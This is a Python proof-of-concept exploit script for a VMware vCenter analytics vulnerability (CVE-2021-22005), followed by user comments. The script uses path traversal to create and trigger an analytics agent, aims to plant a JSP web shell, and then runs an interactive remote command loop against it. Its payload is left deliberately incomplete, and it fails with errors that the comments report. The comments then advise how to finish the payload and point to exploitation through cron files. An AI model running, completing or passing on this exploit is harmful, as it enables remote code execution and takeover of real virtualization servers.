CVE-2021-22005_PoC.py

CVE-2021-22005_PoC.py

import requests
import random
import string
import sys
import time
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))
def escape(_str):
    _str = _str.replace("&", "&")
    _str = _str.replace("<", "&lt;")
    _str = _str.replace(">", "&gt;")
    _str = _str.replace("\"", "&quot;")
    return _str

def run_shell(url, pwd, cmd):
    burp0_url = url 
    burp0_headers = {"User-Agent": "Mozilla/5.0", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
    burp0_data = {pwd: cmd.strip()}
    ct = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False).content
    ct = ct.split('<pre>')[1].split('</pre>')[0]
    return ct

def createAgent(url, agent_name):
    burp0_url = url + "/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c="+agent_name+"&_i=test2"
    burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"}
    burp0_json={"manifestSpec":{}, "objectType": "a2", "collectionTriggerDataNeeded":  True,"deploymentDataNeeded":True, "resultNeeded": True, "signalCollectionCompleted":True, "localManifestPath": "a7","localPayloadPath": "a8","localObfuscationMapPath": "a9"  }
    requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False)

pwd = id_generator(6)
agent_name = id_generator(6)
shell_name = id_generator(6)+".jsp"
manifestData = """<manifest recommendedPageSize="500">
   <request>
      <query name="vir:VCenter">
         <constraint>
            <targetType>ServiceInstance</targetType>
         </constraint>
         <propertySpec>
            <propertyNames>content.about.instanceUuid</propertyNames>
            <propertyNames>content.about.osType</propertyNames>
            <propertyNames>content.about.build</propertyNames>
            <propertyNames>content.about.version</propertyNames>
         </propertySpec>
      </query>
   </request>
   <cdfMapping>
      <indepedentResultsMapping>
         <resultSetMappings>
            <entry>
               <key>vir:VCenter</key>
               <value>
                  <value xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="resultSetMapping">
                     <resourceItemToJsonLdMapping>
                        <forType>ServiceInstance</forType>
                     <mappingCode><![CDATA[
                        

                        #set($modelKey = $LOCAL-resourceItem.resourceItem.getKey())##
                        #set($objectId = "vim.ServiceInstance:$modelKey.value:$modelKey.serverGuid")##
                        #set($obj = $LOCAL-cdf20Result.newObject("vim.ServiceInstance", $objectId))##
                        $obj.addProperty("OSTYPE", "VMware can't steal this PoC")##
                        $obj.addProperty("BUILD", $content-about-build)##
                        $obj.addProperty("VERSION", $content-about-version)##]]>
                     </mappingCode>
                     </resourceItemToJsonLdMapping>
                  </value>
               </value>
            </entry>
         </resultSetMappings>
      </indepedentResultsMapping>
   </cdfMapping>
   <requestSchedules>
      <schedule interval="1h">
         <queries>
            <query>vir:VCenter</query>
         </queries>
      </schedule>
   </requestSchedules>
</manifest>""" % (shell_name, pwd, pwd)

target = sys.argv[1]
print "Target: "+ target
print "Creating Agent (of SHIELD) ..."
createAgent(target, agent_name)
print "Collecting Agent (of SHIELD) ..."
burp0_url = target+"/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c="+agent_name+"&_i=test2"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"}
burp0_json={"contextData": "a3", "manifestContent": manifestData, "objectId": "a2"}
requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False, proxies={"https":"http://127.0.0.1:8080"})
print "Success!"
print "Shell: " + target+"/idm/..;/"+shell_name
print "Pwd: "+ pwd
print "Launching pseudo shell ..."
while True:
    cmd = raw_input("/remote_shell/# ").strip()
    if(cmd =="quit"):
        sys.exit(-1)
    output = run_shell(target+"/idm/..;/"+shell_name,pwd, cmd)
    time.sleep(1)
    print(output)

nice but:
(cve20212022) PS C:\temp\cve20212022> python .\CVE20212022.py
File "C:\temp\cve20212022\CVE20212022.py", line 86
print "Target: "+ target
^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print("Target: "+ target)?
(cve20212022) PS C:\temp\cve20212022> notepad++.exe
(cve20212022) PS C:\temp\cve20212022> notepad++.exe
(cve20212022) PS C:\temp\cve20212022> python .\CVE20212022.py
File "C:\temp\cve20212022\CVE20212022.py", line 87
print "Creating Agent (of SHIELD) ..."
^
SyntaxError: invalid syntax

u can fix it easly by editing print line from
print ""
To
print("")

thanks it worked out but now this:
(cve20212022) PS C:\temp\cve20212022> python .\CVE20212022.py
Traceback (most recent call last):
File "C:\temp\cve20212022\CVE20212022.py", line 36, in
manifestData = """
TypeError: not all arguments converted during string formatting

any ideas ? your video poc is pretty smooth

even putting () in the prints continues to give error

to anyone wondering you just need to modify mappingCode to execute velocity payload, this is unfinished poc so suit yourself

did anyone manage to abuse GLOBAL-Logger (Log4J) to bypass Velocity?

It looks like this is being exploited in the wild a simpler way by writing a json file to /etc/cron.d/ without doing the velocity template injection https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005 Are you going to publish a full poc?

https://kb.vmware.com/s/article/85717
https://youtu.be/mMpDzL_fplM